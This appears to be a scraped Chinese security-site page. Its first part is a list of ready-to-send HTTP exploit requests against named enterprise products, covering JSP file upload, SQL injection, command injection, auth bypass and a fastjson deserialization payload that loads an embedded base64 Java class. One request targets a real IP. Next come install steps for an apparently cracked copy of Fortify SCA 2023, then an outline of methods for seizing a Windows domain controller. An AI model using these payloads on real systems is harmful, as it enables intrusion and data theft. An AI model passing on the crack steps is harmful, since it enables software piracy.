12月漏洞情报 速达软件全系产品存在任意文件上传漏洞POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Connection: close Host: 127.0.0.1 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Upgrade-Insecure-Requests: 1 Content-Type: application/octet-stream Content-Length: 28 <% out.print(""984969719"");%> 红帆 ioffice ioassistance2.asmx存在sql注入POST /ioffice/prg/set/wss/ioAssistance2.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Soapaction: ""http://tempuri.org/GetLoginedEmpNoReadedInf"" User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 <?xml version=""1.0"" encoding=""utf-8""?> <soap:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001 /XMLSchema"" xmlns:soap=""http://schemas.xmlsoap.org/soap/envelope/""> <soap:Body> <GetLoginedEmpNoReadedInf xmlns=""http://tempuri.org/""> <sql>select host_name()</sql> </GetLoginedEmpNoReadedInf> </soap:Body> </soap:Envelope> 万户协同办公平台ezoffice wpsservlet接口存在任意文件上传POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: close Cache-Control: max-age=0 Content-Length: 176 Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb --55aeb894de1521afe560c924fad7c6fb Content-Disposition: form-data; name=""NewFile""; filename=""40067.jsp"" <% out.print(""797276100"");%> --55aeb894de1521afe560c924fad7c6fb-- Honeywell Products远程命令执行漏洞(CVE-2023-3710)POST /loadfile.lp?pageid=Configure HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 Connection: close Content-Length: 56 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1 云优cms request_uri存在代码执行漏洞GET /index.php?s=wap/index/index&asdasd=aa"";print_r(md5(12356));exit;?> HTTP/1.1 Host: User-Agent: Mozilla/5.0 多个产商安全产品存在命令执行GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls 云时空社会化商业ERP系统gpy文件上传POST /servlet/fileupload/gpy HTTP/1.1 Host:IP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388 Content-Length: 215 --4eea98d02AEa93f60ea08dE3C18A1388 Content-Disposition: form-data; name=""file1""; filename=""2.jsp"" Content-Type: application/octet-stream <% out.println(""hello flnb""); %> --4eea98d02AEa93f60ea08dE3C18A1388-- OwnCloud 敏感信息泄漏漏洞（CVE-2023-49103）url存在/owncloud/路径时需要保留 /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php 若依管理系统存在任意文件读取漏洞CNVD-2021-15555GET /common/download/resource?resource=/profile/../../../../../../../../../../etc/passwd HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Connection: Keep-Alive Tongweb selectApp.jsp任意文件上传POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=fa2ef860e94d564632e291131d20064c User-Agent: Mozilla/5.0 --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""app_fileName"" Li4vLi4vYXBwbGljYXRpb25zL2hlaW1kYWxsLzEyM3F3ZTEuanNw --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""app"" --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""className"" test --fa2ef860e94d564632e291131d20064c Content-Disposition: form-data; name=""uploadApp""; filename=""test.jar"" Content-Type: application/java-archive <% out.println(16156223+223415616); %> --fa2ef860e94d564632e291131d20064c-- 云安宝-云匣子 config fastjson RCEPOST /3.0/authService/config HTTP/2 Host: XXXX Accept: application/json, text/plain, */* Content-Type: application/json;charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36 Referer: https://XXXX/ Cmd: echo 7dgdggddg Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Priority: u=1, i Content-Length: 18907 {""a"":{""@type"":""java.lang.Class"",""val"": ""com.mchange.v2.c3p0.WrapperConnectionPoolDataSource""},""b"":{""@type"": ""com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"",""userOverridesAsString"":""HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617463682865297b7d0a20207d0a2020696620286274203d3d206e756c6c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a5852535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f31744d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f4141454151414141414230414151414241414141425371334141477841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a474141637374674134475157774f676373786741484c4c59414f426b487678493773414145414a30424277455341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f484145634141516341532f3841415141474277424842774248427742494277424a4277424b4277424841414948414573484145663841424d484145662f4141494142416341527763415277634153416341535141424277424d2f5141514277424d427742482f7741434141514841456348414563484145674841456b414151634154663841435141494277424842774248427742494277424a414141414277424e4141442f414149414151634152774141414167415467412f4141454151414141414430414151414241414141434c6741504b6341424575784141454141414144414159414f514143414545414141414f41414d414141414d41414d4144514148414134415267414141416341416b59484145774141414541547741414141494155413d3d223b0a636c7a203d20646566696e65436c617373286261736536344465636f6465546f4279746528636f646529293b0a636c7a2e6e6577496e7374616e636528293b7400046576616c7571007e001b0000000171007e0023737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878;""}} NETGEAR DGND3700v2 路由器 setup.cgi 接口身份认证绕过GET /setup.cgi?next_file=passwordrecovered.htm&foo=currentsetting.htm 网神 SecGate3600 authManageSet.cgi 接口登录绕过POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Cookie: sw_login_name=admin User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc 网神 SecGate 3600 防火墙 app_av_import_save 任意文件上传POST /?g=app_av_import_save HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc Cache-Control: no-cache Pragma: no-cache Host: 218.60.144.129 Content-Length: 536 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""MAX_FILE_SIZE"" 10000000 ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""upfile""; filename=""test.txt"" Content-Type: text/plain test ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""submit_post"" obj_app_upfile ------WebKitFormBoundaryJpMyThWnAxbcBBQc Content-Disposition: form-data; name=""__hash__"" 0b9d6b1ab7479ab69d9f71b05e0e9445 ------WebKitFormBoundaryJpMyThWnAxbcBBQc--

代码审计分析工具 Fortify-2023 简介Fortify 能够提供静态和动态应用程序安全测试技术，以及运行时应用程序监控和保护功能。为实现高效安全监测，Fortify具有源代码安全分析，可精准定位漏洞产生的路径，以及具有1分钟1万行的扫描速度。Fortify SCA 支持丰富的开发环境、语言、平台和框架，可对开发与生产混合环境进行安全检查。 27 种编程语言 超过 911,000 个组件级 API 可检测超过 961 个漏洞类别 支持所有主流平台、构建环境和 IDE对开发人员友好的语言覆盖范围 — 支持 ABAP/BSP、ActionScript、Apex、ASP.NET、C# (.NET)、C/C++、Classic ASP（含 VBScript）、COBOL、ColdFusion CFML、Go、HTML、Java（包括 Android）、JavaScript/AJAX、JSP、Kotlin、MXML(Flex)、Objective C/C++、PHP、PL/SQL、Python、Ruby、Swift、T-SQL、VB.NET、VBScript、Visual Basic 和 XML支持的 IDE — Eclipse、IntelliJ Ultimate、IntelliJ Community Android Studio、IBM Rational Application Developer、IBM Rational Software Architect、Microsoft Visual Studio支持的构建工具 — Ant、Jenkins、Maven、MSBuild、Xcodebuild支持的缺陷管理平台 — Jira、ALM、Bugzilla支持的代码管理工具 — Git、SVN、TFS漏洞覆盖范围，包括 1000 多个 SAST 漏洞分类，以确保符合 OWASP Top 10、CWE/SANS Top 25、DISA STIG 和 PCI DSS 等标准。Fortify静态代码分析器安装程序不再包含Fortify 静态代码分析器应用程序和工具。提供了一个单独的安装程序来安装Fortify 静态代码分析器应用程序和工具。1、安装步骤：一、解压补丁压缩包，把fortify.license和Fortify_SCA_23.1.0_windows_x64.exe、Fortify_Apps_and_Tools_23.1.0_windows_x64.exe放在同一目录，不要有中文。二、安装Fortify_SCA_23.1.0_windows_x64.exe，程序会自动找到fortify.license授权文件三、安装Fortify_Apps_and_Tools_23.1.0_windows_x64.exe，程序会自动找到fortify.license授权文件四、把fortify-common-23.1.0.0028.jar分别拷贝到 C:\Program Files\Fortify\Fortify_SCA_23.1.0\Core\lib\和C:\Program Files\Fortify\Fortify_Apps_and_Tools_23.1.0\Core\lib\ 下替换覆盖掉原来的五、解压FortifyRules_zh_CH_2023.1.1.0001(离线规则库).zip 规则库，把ExternalMetadata和rules文件夹拷贝到C:\Program Files\Fortify\Fortify_SCA_23.1.0\Core\config 下六、运行C:\Program Files\Fortify\Fortify_Apps_and_Tools_23.1.0\bin 下的auditworkbench.cmd 即可开启GUI界面七、根据需要配置扫描即可2、规则库直接本地无法升级规则库，离线升级及最新中英文规则库。下载地址： 回复可见内容

windows域控常见打法 0x1 前言最近复习了下域的一些知识，查阅资料的时候感觉比前几年的时候多了不少，越来越透明了，然后这里顺便总结下常见拿域控的方法，都是实战中常用的，每种方法下面都贴了实战或者参考文章的链接，然后平常学习的时候，要理清楚每种漏洞的原理，漏洞需要的条件，然后在实际的环境中,结合收集到的信息,这样才能梳理出正确和清晰的攻击思路。0x2 常见拿域控的方法2.1 高可用域控漏洞通过Zerologon、Nopac、PrintNightmare漏洞一把梭，MS17-010，MS-14068运气很好的话说不定也能梭，然后就是漏洞利用的条件以及漏洞原理搞清楚，具体的漏洞利用过程网上文章超级多了。MS-14608实战文章：https://mp.weixin.qq.com/s/rS-LAAjPI-k0-n_HxlSt9wMS17-010实战文章：https://mp.weixin.qq.com/s/KzghydvJtaFyPOrNanosAgZerologon实战文章：https://mp.weixin.qq.com/s/pBwIpBx7nJ9wu9R7YJR3xgNoPac实战文章：https://mp.weixin.qq.com/s/TLloZlFt-fkxg1pGMk9aQPrintNightmare实战文章：https://mp.weixin.qq.com/s/LrEKrSJiT5zNGahUrFWPFg2.2 抓取凭据或注入域管理员进程查看有没有域管理员进程，没有就尝试密码喷洒或其他漏洞等方法，尽可能多横向机器，有的话注入到域管理员进程。实战文章：https://mp.weixin.qq.com/s/LrEKrSJiT5zNGahUrFWPFg抓取凭据查看没有域管理员凭据，没有就尝试密码喷洒或其他漏洞等方法，也是尽可能多横向机器。实战文章：https://mp.weixin.qq.com/s/gYiBDA14RDQUl1eka_WwIw可以借助BloodHound更直观。2.3 非约束委派主机结合打印机漏洞拿到的这台机器是被域管配置成了非约束委派的话，我们就可以委派域中任意用户去访问任意服务（例如域控的 CIFS 服务），但前提是目标用户向我们发起了 Kerberos 请求，可以使用 PrintBug 或者 PetitPotam等强制认证漏洞来完成。参考文章：https://mp.weixin.qq.com/s/MRtQG6O2eRVczZojJYCw7g实战文章：https://mp.weixin.qq.com/s/BgBMs1QNP35riA6ZsorZSA2.4 CVE-2019-1040这种一般是通过CVE-2019-1040加强制认证进行NTLM Realy，配合RBCD或ACL等来打域控或Exchange等，这一部的涉及的知识挺多的，这次也恶补了下。参考文章：https://mp.weixin.qq.com/s/bbquXVj24j3jbZNs2XZ_YAhttps://mp.weixin.qq.com/s/T55i1FqTonG1aIq9Bcj7VQhttps://mp.weixin.qq.com/s/cnQGg0S9Py7Ix6M9CAqKbg2.5 Exchange漏洞通过利用漏洞如ProxyShell、ProxyNotSell、ProxyLogon、CVE-2021-26857、PrivExchange等来获取Exchange服务器权限，获得Exchange 权限后，由于特殊组的缘故导致其拥有WriteDACL权限，可以修改域内的ACL，赋予Dcsync 